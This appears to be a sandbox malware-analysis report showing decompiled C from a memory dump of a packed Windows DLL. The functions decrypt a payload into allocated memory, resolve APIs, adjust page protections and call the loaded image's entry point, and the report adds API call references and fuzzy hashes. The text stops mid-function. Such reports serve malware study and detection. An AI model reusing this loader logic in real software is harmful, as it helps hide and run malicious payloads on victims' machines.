                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                    • String ID:
                                    • API String ID: 3832013932-0
                                    • Opcode ID: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
                                    • Instruction ID: d0e6ce603a74b2c32c49d3ae4a10fb1c021b7ba32590aecb1dac841decf26725
                                    • Opcode Fuzzy Hash: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
                                    • Instruction Fuzzy Hash: 28F01C36207A25BBDB125BA09C4CF5FBF69FB0A751F04C514FA0991150C7218816BBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E1D15A3(void* __edi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				unsigned int _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				void* _v36;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				intOrPtr _t39;
                                    				void* _t46;
                                    				intOrPtr _t47;
                                    				intOrPtr _t50;
                                    				signed int _t59;
                                    				signed int _t61;
                                    				intOrPtr _t66;
                                    				intOrPtr _t77;
                                    				void* _t78;
                                    				signed int _t80;
                                    
                                    				_t77 =  *0x6e1d41b0;
                                    				_t39 = E6E1D1A4B(_t77,  &_v20,  &_v12);
                                    				_v16 = _t39;
                                    				if(_t39 == 0) {
                                    					asm("sbb ebx, ebx");
                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                    					_t78 = _t77 + _v20;
                                    					_v36 = _t78;
                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                    					_v24 = _t46;
                                    					if(_t46 == 0) {
                                    						_v16 = 8;
                                    					} else {
                                    						_t61 = 0;
                                    						if(_t59 <= 0) {
                                    							_t47 =  *0x6e1d41cc;
                                    						} else {
                                    							_t66 = _a4;
                                    							_t50 = _t46 - _t78;
                                    							_t11 = _t66 + 0x6e1d5137; // 0x6e1d5137
                                    							_v28 = _t50;
                                    							_v32 = _t50 + _t11;
                                    							_v8 = _t78;
                                    							while(1) {
                                    								asm("movsd");
                                    								asm("movsd");
                                    								asm("movsd");
                                    								_t19 = _t61 + 1; // 0x2
                                    								_t80 = _t19;
                                    								E6E1D1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                    								_t64 = _v32;
                                    								_v8 = _v8 + 0x1000;
                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                    								_t61 = _t80;
                                    								 *0x6e1d41cc = _t47;
                                    								if(_t61 >= _t59) {
                                    									break;
                                    								}
                                    								_t50 = _v28;
                                    							}
                                    						}
                                    						if(_t47 != 0x63699bc3) {
                                    							_v16 = 0xc;
                                    						} else {
                                    							memcpy(_v36, _v24, _v12);
                                    						}
                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                    					}
                                    				}
                                    				return _v16;
                                    			}























                                    0x6e1d15aa
                                    0x6e1d15ba
                                    0x6e1d15c1
                                    0x6e1d15c4
                                    0x6e1d15d9
                                    0x6e1d15e0
                                    0x6e1d15e5
                                    0x6e1d15f6
                                    0x6e1d15f9
                                    0x6e1d1601
                                    0x6e1d1604
                                    0x6e1d16ae
                                    0x6e1d160a
                                    0x6e1d160a
                                    0x6e1d160e
                                    0x6e1d1676
                                    0x6e1d1610
                                    0x6e1d1610
                                    0x6e1d1613
                                    0x6e1d1615
                                    0x6e1d161d
                                    0x6e1d1620
                                    0x6e1d1623
                                    0x6e1d162b
                                    0x6e1d1633
                                    0x6e1d1634
                                    0x6e1d1635
                                    0x6e1d163c
                                    0x6e1d163c
                                    0x6e1d1650
                                    0x6e1d1655
                                    0x6e1d165e
                                    0x6e1d1665
                                    0x6e1d1668
                                    0x6e1d166c
                                    0x6e1d1671
                                    0x00000000
                                    0x00000000
                                    0x6e1d1628
                                    0x6e1d1628
                                    0x6e1d1673
                                    0x6e1d1680
                                    0x6e1d1695
                                    0x6e1d1682
                                    0x6e1d168b
                                    0x6e1d1690
                                    0x6e1d16a6
                                    0x6e1d16a6
                                    0x6e1d16b5
                                    0x6e1d16bb

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1D15F9
                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1D17EC), ref: 6E1D168B
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1D16A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Virtual$AllocFreememcpy
                                    • String ID: Mar 26 2021
                                    • API String ID: 4010158826-2175073649
                                    • Opcode ID: 2a59bf677c80a96e1e6a629b15973291b424796aa40ea96af8dba623576ff620
                                    • Instruction ID: 36d1527fb572195886cb7accfefc202a0f410927e916787f6b838ea9cc58b389
                                    • Opcode Fuzzy Hash: 2a59bf677c80a96e1e6a629b15973291b424796aa40ea96af8dba623576ff620
                                    • Instruction Fuzzy Hash: D7313071E4061AAFDF00CF99C880ADEBBB9FF49304F148169D514E7245E771AA4A9F90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E1D1D32(void* __ecx, intOrPtr _a4) {
                                    				long _t3;
                                    				int _t4;
                                    				int _t9;
                                    				void* _t13;
                                    
                                    				_t13 = GetCurrentThread();
                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                    				if(_t3 != 0) {
                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                    				}
                                    				_t4 = E6E1D17A7(_a4); // executed
                                    				_t9 = _t4;
                                    				if(_t9 == 0) {
                                    					SetThreadPriority(_t13, _t4);
                                    				}
                                    				asm("lock xadd [eax], ecx");
                                    				return _t9;
                                    			}







                                    0x6e1d1d3b
                                    0x6e1d1d40
                                    0x6e1d1d4e
                                    0x6e1d1d53
                                    0x6e1d1d53
                                    0x6e1d1d59
                                    0x6e1d1d5e
                                    0x6e1d1d62
                                    0x6e1d1d66
                                    0x6e1d1d66
                                    0x6e1d1d70
                                    0x6e1d1d79

                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6E1D1D35
                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1D1D40
                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1D1D53
                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1D1D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Thread$Priority$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1452675757-0
                                    • Opcode ID: 3f7e41d162a5217541b32f8634b09f35e244071314e4455f7b5eea3eb97db63f
                                    • Instruction ID: e990fd9f5bfde88352b6533d65000baff1717d25945569ae1092a6561cc70cfa
                                    • Opcode Fuzzy Hash: 3f7e41d162a5217541b32f8634b09f35e244071314e4455f7b5eea3eb97db63f
                                    • Instruction Fuzzy Hash: 9DE09231316B152BA7022A694C8CEAFAB5CDF933357110335F524D21D0DB549C4EA5A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E1D1030(void* __eax, void* _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				long _v20;
                                    				int _t43;
                                    				long _t54;
                                    				signed int _t57;
                                    				void* _t58;
                                    				signed int _t60;
                                    
                                    				_v12 = _v12 & 0x00000000;
                                    				_t57 =  *0x6e1d41cc;
                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                    				_v8 = _v8 & 0x00000000;
                                    				if(_v16 <= 0) {
                                    					L12:
                                    					return _v12;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				while(1) {
                                    					L1:
                                    					_t60 = _v12;
                                    					if(_t60 != 0) {
                                    						goto L12;
                                    					}
                                    					asm("bt [esi+0x24], eax");
                                    					if(_t60 >= 0) {
                                    						asm("bt [esi+0x24], eax");
                                    						if(__eflags >= 0) {
                                    							L8:
                                    							_t54 = _t57 - 0x63699bbf;
                                    							L9:
                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                    							if(_t43 == 0) {
                                    								_v12 = GetLastError();
                                    							}
                                    							_v8 = _v8 + 1;
                                    							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                    							if(_v8 < _v16) {
                                    								continue;
                                    							} else {
                                    								goto L12;
                                    							}
                                    						}
                                    						asm("bt [esi+0x24], eax");
                                    						_t54 = _t57 - 0x63699bc1;
                                    						if(__eflags >= 0) {
                                    							goto L9;
                                    						}
                                    						goto L8;
                                    					}
                                    					asm("bt [esi+0x24], eax");
                                    					if(_t60 >= 0) {
                                    						_t54 = _t57 - 0x63699ba3;
                                    					} else {
                                    						_t54 = _t57 - 0x63699b83;
                                    					}
                                    					goto L9;
                                    				}
                                    				goto L12;
                                    			}












                                    0x6e1d103a
                                    0x6e1d1047
                                    0x6e1d104d
                                    0x6e1d1059
                                    0x6e1d1069
                                    0x6e1d106b
                                    0x6e1d1073
                                    0x6e1d1108
                                    0x6e1d110f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d1079
                                    0x6e1d1079
                                    0x6e1d1079
                                    0x6e1d107d
                                    0x00000000
                                    0x00000000
                                    0x6e1d1089
                                    0x6e1d108d
                                    0x6e1d10b1
                                    0x6e1d10b5
                                    0x6e1d10c9
                                    0x6e1d10c9
                                    0x6e1d10cf
                                    0x6e1d10de
                                    0x6e1d10e2
                                    0x6e1d10ea
                                    0x6e1d10ea
                                    0x6e1d10f2
                                    0x6e1d10f5
                                    0x6e1d1102
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d1102
                                    0x6e1d10bd
                                    0x6e1d10c1
                                    0x6e1d10c7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d10c7
                                    0x6e1d1095
                                    0x6e1d1099
                                    0x6e1d10a3
                                    0x6e1d109b
                                    0x6e1d109b
                                    0x6e1d109b
                                    0x00000000
                                    0x6e1d1099
                                    0x00000000

                                    APIs
                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D1069
                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D10DE
                                    • GetLastError.KERNEL32 ref: 6E1D10E4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ProtectVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 1469625949-0
                                    • Opcode ID: dab466aa1fef39633953ffcd4b66989a227940603a93c479070d5bc90d12bb03
                                    • Instruction ID: 4270b57b5c1e9349269516cada4e7eb5d3a5970724231ff40b8147d9e2fae22f
                                    • Opcode Fuzzy Hash: dab466aa1fef39633953ffcd4b66989a227940603a93c479070d5bc90d12bb03
                                    • Instruction Fuzzy Hash: 5B217131A0120ADFCB14DF95C881AAEF7F6FF08319F008959D10697545E3B8A69DDF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E6E1D16EC() {
                                    				char _v28;
                                    				void _v44;
                                    				char _v48;
                                    				void* _v52;
                                    				long _t23;
                                    				int _t24;
                                    				void* _t28;
                                    				intOrPtr* _t30;
                                    				signed int _t34;
                                    				intOrPtr _t36;
                                    
                                    				_push(0);
                                    				_push(0x6e1d41c4);
                                    				_push(1);
                                    				_push( *0x6e1d41d0 + 0x6e1d5089);
                                    				 *0x6e1d41c0 = 0xc;
                                    				 *0x6e1d41c8 = 0; // executed
                                    				L6E1D14D8(); // executed
                                    				_t34 = 6;
                                    				memset( &_v44, 0, _t34 << 2);
                                    				if(E6E1D1112( &_v44,  &_v28,  *0x6e1d41cc ^ 0xfd7cd1cf) == 0) {
                                    					_t23 = 0xb;
                                    					L7:
                                    					ExitThread(_t23);
                                    				}
                                    				_t24 = lstrlenW( *0x6e1d41b8);
                                    				_t7 = _t24 + 2; // 0x2
                                    				_t10 = _t24 + _t7 + 8; // 0xa
                                    				_t28 = E6E1D1979(_t36, _t10,  &_v48,  &_v52); // executed
                                    				if(_t28 == 0) {
                                    					_t30 = _v52;
                                    					 *_t30 = 0;
                                    					if( *0x6e1d41b8 == 0) {
                                    						 *((short*)(_t30 + 4)) = 0;
                                    					} else {
                                    						E6E1D2112(_t40, _t30 + 4);
                                    					}
                                    				}
                                    				_t23 = E6E1D1236(_v44); // executed
                                    				goto L7;
                                    			}













                                    0x6e1d16fe
                                    0x6e1d16ff
                                    0x6e1d1704
                                    0x6e1d170c
                                    0x6e1d170d
                                    0x6e1d1717
                                    0x6e1d171d
                                    0x6e1d1726
                                    0x6e1d172b
                                    0x6e1d1749
                                    0x6e1d179e
                                    0x6e1d179f
                                    0x6e1d17a0
                                    0x6e1d17a0
                                    0x6e1d1751
                                    0x6e1d1757
                                    0x6e1d1765
                                    0x6e1d1769
                                    0x6e1d1770
                                    0x6e1d1778
                                    0x6e1d177c
                                    0x6e1d177e
                                    0x6e1d178d
                                    0x6e1d1780
                                    0x6e1d1786
                                    0x6e1d1786
                                    0x6e1d177e
                                    0x6e1d1795
                                    0x00000000

                                    APIs
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1D41C4,00000000), ref: 6E1D171D
                                    • lstrlenW.KERNEL32(?,?,?), ref: 6E1D1751
                                      • Part of subcall function 6E1D1979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?,?), ref: 6E1D1986
                                      • Part of subcall function 6E1D1979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1D199C
                                      • Part of subcall function 6E1D1979: _snwprintf.NTDLL ref: 6E1D19C1
                                      • Part of subcall function 6E1D1979: CreateFileMappingW.KERNELBASE(000000FF,6E1D41C0,00000004,00000000,?,?), ref: 6E1D19E6
                                      • Part of subcall function 6E1D1979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D19FD
                                      • Part of subcall function 6E1D1979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A), ref: 6E1D1A32
                                    • ExitThread.KERNEL32 ref: 6E1D17A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                    • String ID:
                                    • API String ID: 4209869662-0
                                    • Opcode ID: 215de56e8b70bdab723727cb084e80888da0dc0788332ef46f9013854c9f4122
                                    • Instruction ID: d643c367d76ae1bd3e83c4635a8828e026232ecb5abaea1603a07f83ccf19492
                                    • Opcode Fuzzy Hash: 215de56e8b70bdab723727cb084e80888da0dc0788332ef46f9013854c9f4122
                                    • Instruction Fuzzy Hash: 4511EF72205206AFDB01DFA4CC48E9BBBECFB55324F118A16F144D7150D730E48DAB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E6E1D1C12(void* __ecx) {
                                    				void* _v8;
                                    				char _v12;
                                    				signed short _t15;
                                    				char* _t18;
                                    				char* _t25;
                                    				char* _t29;
                                    
                                    				_t22 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t25 = 0;
                                    				if(E6E1D1112( &_v8,  &_v12,  *0x6e1d41cc ^ 0x196db149) != 0) {
                                    					if(_v8 == 0) {
                                    						_t29 = 0;
                                    					} else {
                                    						_t29 = E6E1D1BCB(_t22, _v8,  *0x6e1d41cc ^ 0x6e49bbff);
                                    					}
                                    					if(_t29 != 0) {
                                    						_t15 = E6E1D1566(_t22); // executed
                                    						_v12 = _t15 & 0x0000ffff;
                                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                                    						if(_t18 != 0) {
                                    							_t25 = 0x657;
                                    						}
                                    					}
                                    					HeapFree( *0x6e1d4190, 0, _v8);
                                    				}
                                    				return _t25;
                                    			}









                                    0x6e1d1c12
                                    0x6e1d1c15
                                    0x6e1d1c16
                                    0x6e1d1c2c
                                    0x6e1d1c35
                                    0x6e1d1c3a
                                    0x6e1d1c53
                                    0x6e1d1c3c
                                    0x6e1d1c4f
                                    0x6e1d1c4f
                                    0x6e1d1c57
                                    0x6e1d1c59
                                    0x6e1d1c61
                                    0x6e1d1c69
                                    0x6e1d1c71
                                    0x6e1d1c73
                                    0x6e1d1c73
                                    0x6e1d1c71
                                    0x6e1d1c83
                                    0x6e1d1c83
                                    0x6e1d1c8e

                                    APIs
                                    • StrStrIA.KERNELBASE(00000000,6E1D1810,?,6E1D1810,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1C69
                                    • HeapFree.KERNEL32(00000000,?,?,6E1D1810,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1C83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 6b34c45540b45c4d11809be2e5ad09afbb7725e12edb6767f6c36e80f7545566
                                    • Instruction ID: cd951865596e0116e5f7712993a4885edff3d6f7748c59129ce858c11a969ac7
                                    • Opcode Fuzzy Hash: 6b34c45540b45c4d11809be2e5ad09afbb7725e12edb6767f6c36e80f7545566
                                    • Instruction Fuzzy Hash: 42018F76B01525ABDB00CBE5CC40E9F7BBDAB96640F504562EA01E3100E630EA49BBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __encode_pointer.LIBCMTD ref: 6E212B27
                                      • Part of subcall function 6E212A50: TlsGetValue.KERNEL32(6E29C234,00000000), ref: 6E212A65
                                      • Part of subcall function 6E212A50: TlsGetValue.KERNEL32(6E29C234,6E29C230), ref: 6E212A86
                                      • Part of subcall function 6E212A50: __crt_wait_module_handle.LIBCMTD ref: 6E212A9C
                                      • Part of subcall function 6E212A50: GetProcAddress.KERNEL32(00000000,6E2692EC), ref: 6E212AB6
                                      • Part of subcall function 6E212A50: RtlEncodePointer.NTDLL(?), ref: 6E212AD7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                                    • String ID:
                                    • API String ID: 568403282-0
                                    • Opcode ID: 3c7ee718fe0a70fa201be2b3f7fa82a5cabb4accedd3dd1403c11f2375cd5494
                                    • Instruction ID: f6256935d26da0a7d9e4b275ede5b468de832ef32f6017b2302cd220aaf19b24
                                    • Opcode Fuzzy Hash: 3c7ee718fe0a70fa201be2b3f7fa82a5cabb4accedd3dd1403c11f2375cd5494
                                    • Instruction Fuzzy Hash: 5CA012A748820C23D11011C23802B53354D43C1538E090020F60D061412842A5114093
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E6E1D1236(void* __eax) {
                                    				char _v8;
                                    				void* _v12;
                                    				void* __edi;
                                    				void* _t18;
                                    				long _t24;
                                    				long _t26;
                                    				long _t29;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr* _t42;
                                    				void* _t44;
                                    
                                    				_t41 = __eax;
                                    				_t16 =  *0x6e1d41cc;
                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4);
                                    				_t18 = E6E1D1AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                    				if(_t18 != 0) {
                                    					_t29 = 8;
                                    					goto L8;
                                    				} else {
                                    					_t40 = _v8;
                                    					_t29 = E6E1D14DE(_t33, _t40, _t41);
                                    					if(_t29 == 0) {
                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                    						_t24 = E6E1D1F31(_t40, _t44); // executed
                                    						_t29 = _t24;
                                    						if(_t29 == 0) {
                                    							_t26 = E6E1D1030(_t44, _t40); // executed
                                    							_t29 = _t26;
                                    							if(_t29 == 0) {
                                    								_push(_t26);
                                    								_push(1);
                                    								_push(_t40);
                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                    									_t29 = GetLastError();
                                    								}
                                    							}
                                    						}
                                    					}
                                    					_t42 = _v12;
                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                    					E6E1D136A(_t42);
                                    					L8:
                                    					return _t29;
                                    				}
                                    			}














                                    0x6e1d123e
                                    0x6e1d1240
                                    0x6e1d125c
                                    0x6e1d126d
                                    0x6e1d1274
                                    0x6e1d12d2
                                    0x00000000
                                    0x6e1d1276
                                    0x6e1d1276
                                    0x6e1d1280
                                    0x6e1d1284
                                    0x6e1d1289
                                    0x6e1d128c
                                    0x6e1d1291
                                    0x6e1d1295
                                    0x6e1d129a
                                    0x6e1d129f
                                    0x6e1d12a3
                                    0x6e1d12a8
                                    0x6e1d12a9
                                    0x6e1d12ad
                                    0x6e1d12b2
                                    0x6e1d12ba
                                    0x6e1d12ba
                                    0x6e1d12b2
                                    0x6e1d12a3
                                    0x6e1d1295
                                    0x6e1d12bc
                                    0x6e1d12c5
                                    0x6e1d12c9
                                    0x6e1d12d3
                                    0x6e1d12d9
                                    0x6e1d12d9

                                    APIs
                                      • Part of subcall function 6E1D1AA5: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1D1272,?,?,?,?), ref: 6E1D1AC9
                                      • Part of subcall function 6E1D1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1AEB
                                      • Part of subcall function 6E1D1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B01
                                      • Part of subcall function 6E1D1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B17
                                      • Part of subcall function 6E1D1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B2D
                                      • Part of subcall function 6E1D1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B43
                                      • Part of subcall function 6E1D14DE: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E1D1280,?,?,?,?,?,?), ref: 6E1D150B
                                      • Part of subcall function 6E1D14DE: memcpy.NTDLL(?,?,?), ref: 6E1D153E
                                      • Part of subcall function 6E1D1F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1D1F69
                                      • Part of subcall function 6E1D1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D1069
                                      • Part of subcall function 6E1D1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D10DE
                                      • Part of subcall function 6E1D1030: GetLastError.KERNEL32 ref: 6E1D10E4
                                    • GetLastError.KERNEL32(?,?,?,?,?), ref: 6E1D12B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 2673762927-0
                                    • Opcode ID: b37cda8346b69e0a4eb4bc3994a6b4bc8e6612d55b93b159001fc2d6fdca06ae
                                    • Instruction ID: 36af3505e280e525d1f3c179f56dd7a63db1759b8c8f48c0c1847e28783faf4d
                                    • Opcode Fuzzy Hash: b37cda8346b69e0a4eb4bc3994a6b4bc8e6612d55b93b159001fc2d6fdca06ae
                                    • Instruction Fuzzy Hash: 0F113476700705ABC7109BE9CC80DCB77BCBF882087104528E901D3644EBA1ED4E97E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 6E20A8FD
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E20A914
                                    • UnhandledExceptionFilter.KERNEL32(6E26835C), ref: 6E20A91F
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 6E20A93D
                                    • TerminateProcess.KERNEL32(00000000), ref: 6E20A944
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: a0c86f704a370907edba58d307914d565b82c8a3b084815a7e55ea22994224dd
                                    • Instruction ID: 83ab946d28fd65985b0f361cb13a7e02433566af23b0bcc5efd6ff7c715203b6
                                    • Opcode Fuzzy Hash: a0c86f704a370907edba58d307914d565b82c8a3b084815a7e55ea22994224dd
                                    • Instruction Fuzzy Hash: DD21CDB8800A08DFCF40EFA9D54DA9D7BB7BB0A314F44515AE90897340F7B16985CF66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D146C() {
                                    				void* _t1;
                                    				long _t3;
                                    				void* _t4;
                                    				long _t5;
                                    				void* _t6;
                                    				intOrPtr _t8;
                                    
                                    				_t8 =  *0x6e1d41b0;
                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                    				 *0x6e1d41bc = _t1;
                                    				if(_t1 == 0) {
                                    					return GetLastError();
                                    				}
                                    				_t3 = GetVersion();
                                    				if(_t3 <= 5) {
                                    					_t4 = 0x32;
                                    					return _t4;
                                    				} else {
                                    					 *0x6e1d41ac = _t3;
                                    					_t5 = GetCurrentProcessId();
                                    					 *0x6e1d41a8 = _t5;
                                    					 *0x6e1d41b0 = _t8;
                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                    					 *0x6e1d41a4 = _t6;
                                    					if(_t6 == 0) {
